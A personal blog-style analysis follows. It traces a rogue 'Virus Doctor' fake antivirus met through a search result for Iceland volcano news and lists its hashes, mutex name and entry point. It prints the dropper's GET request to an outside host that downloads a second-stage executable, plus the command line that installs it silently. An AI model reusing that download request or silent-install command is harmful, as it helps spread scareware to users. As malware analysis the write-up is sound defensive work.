We use Google search for every instance in our life, it may be from gardening to university study to keeping ourselves updated. How about a search to get some details on the recent Iceland volcanic activity, and it leading to malware!! Dangerous isn't it!! But this occasionally occurs!! We need to be careful with our sites we visit from Google search results. Google is taking the maximum efforts to reduce the search results going bad! But still we need to be careful of.

Today morning, while casually searching in Google for the recent updates on the volcanic activity in my opera browser, led me to a fantasy! A Message-box saying "Warning! Your computer is at risk of malware attacks". Was happy! I caught a rouge, Fake-Alert. I thought of investigating it. Moved the message box sideways and found my Browser minimized under it. I have attached the screen-shot below in Firefox!

A message box prompting me that "Warning! Your system is at risk of malware attacks" and they assure that they will help me in strengthening my system. I was panicked. I agreed to its request by clicking OK to it. It then opened the Firefox window and started scanning my system. It even displayed my IP address and my system environment parameters.

After the scanning is complete, it started alerting me that my system has a lot of problems and need to be fixed. Check the screenshot below. The problems reported were 1. registry to be fixed, 2. Remove outdated temporary junk files, 3. Hard disk Defragmentation, 4. Disk surface analysis, 5. Webpage download speed.

I clicked the message box and it prompted me to download and save the file named "packupdate_build30_287.exe", and i did so. The MD5 of the file is

MD5:   9d44165fa043a2f9674055055233598e
SHA-1: f9e69be0459c57d187e786ff30a7609b2b6edcf0

Now, I let the file execute. It started extracting.

After extracting a system scan started.

Finally,

My system is infected now!! Now panic at the extreme!! Wanting to fix it, clicked on "remove all". It was kind to open a window asking me to buy the protection for 6 months (65.00$) or 1 year (100.00$).
Should I buy?

No, without any doubts. I know that I have executed the file in a clean built WinXP SP2 Virtual Machine test environment in non-persistent mode and there is no chance of it getting infected.

I wanted to know more about its behavior and started to analyze it. This is a standalone executable is a UPX packed one. After a long times of trying to understand the packer and unpack the file, Finally found the Entry point at,

0042905C   E8 59960000      CALL packupda.004326BA

On analyzing the strings, found it could be a variant of the famous rogue, "Virus Doctor". It installs the mutex

004140D9  |> 68 48414000    PUSH 123.00404148                        ; /MutexName = "VirusDoctorInstallerMutex"

This file doesn't do anything great, it just downloads a file from "update1.savecompnow.com" with a special GET request,

GET /index.php?controller=microinstaller&abbr=MSE&setupType=xp&ttl=212006541a1&pid= HTTP/1.1
User-Agent: Mozilla/5.0 (Windows;U; Windows NT 5.1; en;)
Host: update1.savecompnow.com


With the above requests, it downloads a file "MS64d4.exe" to "C:\Documents and Settings\All Users\Application Data\64d44d4", with hash
MD5: 67a790897462d3b238db34d53420f13a
SHA-1: 2ab7447375132b7f9367936b241913a25c4b2c71
and executes the file with Command Line Parameter
""C:\Documents and Settings\All Users\Application Data\64d44d4\MS64d4.exe" /s /i /uid=287 /ls=30 "
/s - Silent
/i - Install

If you browse this "update1.savecompnow.com" site by browser like IE or Firefox, it displays
ABBR is not properly set
SetupType is not properly set

---

Tip: You can save your browser from resizing by changing the javascript setting in firefox as shown below.